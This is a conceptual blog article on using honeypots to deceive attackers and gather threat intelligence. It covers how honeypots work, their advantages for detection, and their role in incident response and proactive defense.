Extracting Threat Intelligence From Honeypots

by Sachin

The use of deception in warfare is nothing new, and the same principle applies to both cyber attack and cyber defense. If a cyber defender can trick a hacker into wasting their time and resources on a fake target, then the attacker has fewer resources available to exploit real targets. Additionally, the defender may have an opportunity to extract useful information (or threat intelligence) regarding the attacker’s tactics, techniques, and procedures (TTPs).

A honeypot is one of the simplest options for implementing deception within a network. Understanding what is a honeypot and how it works can help an organization to collect and operationalize threat intelligence to help protect against attackers targeting their network.

How Honeypots Work

In the end, a honeypot is just another computer on an organization’s network. It can be a physical device, but it is generally a virtual machine (VM) because a VM is easier to monitor and clean up. Additionally, a VM can be configured with introspection, where the host machine has full visibility into the guest VM’s activities without this monitoring being detectable to malware or a hacker operating on the VM.

However, a honeypot is unlike the rest of an organization’s systems because it is intended to be a target of attack. Honeypots are often designed to have vulnerabilities that a hacker could exploit. For example, the honeypot may run a web server that contains a command execution or SQL injection vulnerability. By designing a honeypot to be an appealing target to a hacker (by making it vulnerable to attack and appear to contain valuable data), an organization can trick an attacker into focusing their efforts on attacking it rather than targeting the rest of the company’s network.

Advantages Of Honeypots For Threat Intelligence Collection

By design, a honeypot is not part of an organization’s real network. As a result, there is no legitimate use for the honeypot, and any connections to or from the honeypot or activities performed on the honeypot are automatically suspicious or malicious.

This is extremely valuable when attempting to collect threat intelligence regarding a potential attacker. On normal systems, legitimate activities performed in the course of daily business cause a number of state changes on the machine. Differentiating a benign state change (performed by an employee) from a malicious one (performed by a hacker) can be difficult. As a result, real attacks against the system can be lost in the noise, and an organization’s security team may waste valuable time and energy investigating potential incidents that turn out to be false positives.

On a honeypot, every state change is caused by an unauthorized use of the device because no authorized uses of the device exist. This enables an organization’s security team to easily differentiate real attacks from false positive detections.

Additionally, the nature of a honeypot provides security teams with the opportunity to spend more time observing how an attacker reacts to certain situations. Since nothing important or valuable is stored on the machine, there is no risk associated with allowing a hacker to poke around inside it. It is even possible to orchestrate certain challenges for the hacker to overcome in order to force them to reveal their tools and techniques since oddities in the configuration of the machine have no impact on normal operations.

Honeypots Inform Incident Response Activities

Beyond the potential for wasting an attacker’s time, honeypots are also valuable because they can provide a preview of the types of attacks that an organization needs to be capable of defending against. The tools and techniques that a hacker uses to break into a honeypot are likely to be the same ones used to attack the rest of the network. If the honeypot is attacked first and reveals the tools in use, an organization’s security team has a window to implement any required protections before the rest of the network is at risk.

The same philosophy can also apply to protecting against malware attacks targeting the organization. For example, research has found that most ransomware is executed three days after the initial breach in order to hide the signs of an infection. If a honeypot is infected with the ransomware in advance of the rest of the network, the start of data encryption on the honeypot provides a warning to check the rest of the network for malware lying dormant on machines.

Using Honeypots For Proactive Cyber Defense

Many organizations are preventative and reactive in their approach to cybersecurity. A security team or security operations center (SOC) monitors for alerts that indicate that a cyberattack is potentially in progress. If the organization’s existing cyber defenses don’t block the attack, the security team can engage in incident response and remediation.

While this approach can be effective, it is also expensive and damaging to the organization. Only responding to an attack when it is in progress can mean that that damage is already done before the incident is remediated.

In many cases, proactive cyber defense activities like threat hunting require a certain level of knowledge of the organization’s environment and potential cyber threats to be effective. However, the use of a honeypot can enable an organization to be more proactive in defending against attacks without the same level of cybersecurity knowledge and experience. By deploying and monitoring a honeypot and protecting against the attacks and malware observed within the deceptive environment, a security team may be able to protect real systems before they are targeted with the same attacks.

You may also like